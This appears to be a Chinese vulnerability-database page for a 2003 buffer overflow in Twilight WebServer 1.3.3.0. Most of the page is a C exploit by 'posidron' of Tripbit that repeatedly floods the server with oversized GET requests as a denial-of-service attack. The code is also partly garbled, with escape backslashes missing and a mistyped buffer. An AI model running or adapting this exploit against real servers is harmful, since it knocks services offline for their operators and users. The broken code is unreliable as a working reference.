Twilight WebServer 1.3.3.0 – GET Buffer Overflow
漏洞ID | 1054016 | 漏洞类型 | |
发布时间 | 2003-07-07 | 更新时间 | 2003-07-07 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8181/info
It has been reported that Twilight WebServer may be prone to a remote buffer overflow vulnerability. The problem may be present due to a lack of bounds checking performed on incoming GET requests. Arbitrary code execution may be possible.
/****************************************************************************
* Title: Denial of Service Attack against Twilight Webserver v1.3.3.0
* Author: posidron
*
* Date: 2003-07-07
* Reference: http://www.twilightutilities.com
* Version: Twilight Webserver v1.3.3.0
* Related Info: http://www.tripbit.org/advisories/twilight_advisory.txt
*
* Exploit: twilight.c
* Compile: gcc twilight -o twilight
*
* Tripbit Security Development
*
* Contact
* [-] Mail: [email protected]
* [-] Web: http://www.tripbit.org
* [-] IRC: irc.euirc.net 6667 #tripbit
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41d780 in ?? ()
*****************************************************************************/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in srv;
struct hostent *host;
char send[1052], *flood[1037], get[3] = "GET", http[12] = "HTTP/1.0rn";
memset(flood, 0x41, 1037);
strncpy(send, get, sizeof(send) -1);
strncat(send, flood, sizeof(send) - strlen(send) -1);
strncat(send, http, sizeof(send) - strlen(send) -1);
if(argc < 3)
{
printf("Usage: %s [target] <port>n", argv[0]);
exit(0);
}
if((host = gethostbyname(argv[1])) == NULL)
{
printf("Unknown host!n");
exit(0);
}
srv.sin_family = AF_INET;
srv.sin_port = htons(atoi(argv[2]));
srv.sin_addr.s_addr = inet_addr((char*)argv[1]);
printf("DoS against Twilight Webserver v1.3.3.0n");
for(;;)
{
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Can't start socket()!n"); exit(0);
}
if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)
{
printf("Connection to server broken!n"); close(sockfd);
}
if(write(sockfd, send, strlen(send)) < 0)
{
break;
}
close(sockfd);
}
printf("Attack done!...n");
return 0;
}
相关推荐: Internet Explorer文本文件泄露漏洞
Internet Explorer文本文件泄露漏洞 漏洞ID 1205022 漏洞类型 未知 发布时间 2001-12-06 更新时间 2001-12-06 CVE编号 CVE-2001-0807 CNNVD-ID CNNVD-200112-076 漏洞平台 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666